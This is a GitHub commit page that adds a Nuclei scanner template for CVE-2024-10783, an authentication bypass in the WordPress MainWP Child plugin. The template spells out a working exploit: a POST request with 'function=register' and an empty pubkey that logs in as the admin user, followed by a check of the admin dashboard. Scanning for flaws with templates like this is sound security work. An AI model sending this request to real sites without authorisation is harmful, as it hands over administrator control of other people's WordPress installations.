Skip to content

Commit 8c461e3

Browse files
authored
Merge pull request #11811 from projectdiscovery/pussycat0x-patch-1
Create CVE-2024-10783.yaml
2 parents ff001e0 + d502bd8 commit 8c461e3

File tree

1 file changed

+70
-0
lines changed

1 file changed

+70
-0
lines changed

http/cves/2024/CVE-2024-10783.yaml

+70
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,70 @@
1+
id: CVE-2024-10783
2+
3+
info:
4+
name: WordPress Plugin MainWP Child - Authentication Bypass
5+
author: Sean Murphy,iamnoooob,rootxharsh,pdresearch
6+
severity: high
7+
description: |
8+
The plugin is vulnerable to an authentication bypass that allows an unauthenticated user to login as an administrator without providing a password. This vulnerability is only exploitable when the plugin has not been connected to a MainWP Dashboard and the "Require unique security ID" option is not enabled (it is disabled by default).
9+
reference:
10+
- https://wpscan.com/vulnerability/1898d4f4-1874-4d00-8930-15774d57c9ed/
11+
- https://plugins.trac.wordpress.org/browser/mainwp-child/tags/5.2/class/class-mainwp-child.php#L76
12+
- https://plugins.trac.wordpress.org/browser/mainwp-child/tags/5.2/class/class-mainwp-connect.php#L69
13+
- https://plugins.trac.wordpress.org/browser/mainwp-child/tags/5.2/class/class-mainwp-connect.php#L788
14+
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3197586%40mainwp-child&new=3197586%40mainwp-child&sfp_email=&sfph_mail=
15+
classification:
16+
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
17+
cvss-score: 8.1
18+
cve-id: CVE-2024-10783
19+
cwe-id: CWE-862
20+
epss-score: 0.00103
21+
epss-percentile: 0.2532
22+
metadata:
23+
verified: true
24+
max-request: 2
25+
publicwww-query: "/wp-content/plugins/mainwp-child/"
26+
tags: cve,cve2024,wp,mainwp-child,wpscan,wordpress,wp-plugin,auth-bypass
27+
28+
flow: http(1) && http(2)
29+
30+
variables:
31+
username: admin
32+
33+
http:
34+
- raw:
35+
- |
36+
POST / HTTP/1.1
37+
Host: {{Hostname}}
38+
Content-Type: application/x-www-form-urlencoded
39+
40+
function=register&user={{username}}&pubkey=
41+
42+
matchers-condition: and
43+
matchers:
44+
- type: word
45+
part: header
46+
words:
47+
- wordpress_logged_in
48+
internal: true
49+
50+
- type: word
51+
part: body
52+
words:
53+
- '<mainwp>'
54+
internal: true
55+
56+
- raw:
57+
- |
58+
GET /wp-admin/index.php HTTP/1.1
59+
Host: {{Hostname}}
60+
61+
matchers-condition: and
62+
matchers:
63+
- type: word
64+
part: body
65+
words:
66+
- 'Howdy, {{username}}'
67+
68+
- type: status
69+
status:
70+
- 200

0 commit comments

Comments
 (0)